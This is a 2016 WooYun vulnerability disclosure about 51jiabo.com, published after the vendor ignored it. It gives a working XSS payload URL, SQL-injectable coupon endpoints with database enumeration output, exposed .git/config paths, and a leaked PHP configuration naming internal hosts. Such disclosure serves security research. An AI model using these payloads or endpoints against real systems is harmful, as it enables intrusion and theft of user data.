当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186776

漏洞标题:中国华夏家博会漏洞打包(XSS+多处SQL注入致98万用户信息泄露+应用配置错误致整站源码及数据库敏感信息泄露)

相关厂商:中国华夏家博会

漏洞作者: 路人甲

提交时间:2016-03-21 13:27

修复时间:2016-05-05 13:27

公开时间:2016-05-05 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT.

详细说明:

#1 XSS 完全没有过滤的节奏呀有木有

http://sh.51jiabo.com/member/login.shtml?redirect_url=b3JkZXIvc2FsZQ==%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


#2 SQL注入

http://zz.51jiabo.com/get_special_coupon?code_id=2


http://qd.51jiabo.com/get_special_coupon?code_id=2


http://sh.51jiabo.com/get_special_coupon?code_id=2


QQ截图20160319183321.png


current user:    '[email protected].%'


current database:    'hxjb_user'


available databases [4]:
[*] hxjb_manage
[*] hxjb_user
[*] information_schema
[*] test


98万用户数据泄露

QQ截图20160319183321.png


可拖库

QQ截图20160319183321.png


#3 应用配置错误整站源码+数据库敏感信息泄露

http://www.ticket.51jiabo.com/.git/config


http://gz.ticket.51jiabo.com/.git/config


http://ks.ticket.51jiabo.com/.git/config ...


QQ截图20160319183321.png


QQ截图20160319183321.png


数据库信息泄露

QQ截图20160319183321.png


QQ截图20160319183321.png


QQ截图20160319183321.png


然而并不能外联
部分敏感信息

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');
# 测试
// $config['API_BURL'] = 'http://test.api.51jiabo.com:8080/hxjb/'; // 测试接口基础路径
# 正式
$config['API_BURL'] = 'https://api.51jiabo.com/hxjb/'; // 接口基础路径

$config['SMS_LINK'] = 'http://172.16.1.33:8888/sms/send.do'; // 短信通道
$config['SEND_SMS_LINK'] = 'http://172.16.1.33:8888/sms/sendSms.do'; // 模板短信通道
# LOG Host
$config['LOG_BURL'] = 'http://172.16.1.68:8080/'; // LOG Host


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)